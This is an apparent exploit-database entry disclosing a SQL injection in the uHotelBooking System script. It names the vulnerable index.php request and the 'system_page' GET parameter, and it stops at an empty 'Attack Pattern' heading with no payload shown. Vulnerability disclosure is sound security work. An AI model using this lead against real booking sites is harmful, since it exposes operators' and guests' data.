Uhotelbooking system system_page sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-21 | Type : webapps | Platform : php
This exploit / vulnerability Uhotelbooking system system_page sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern: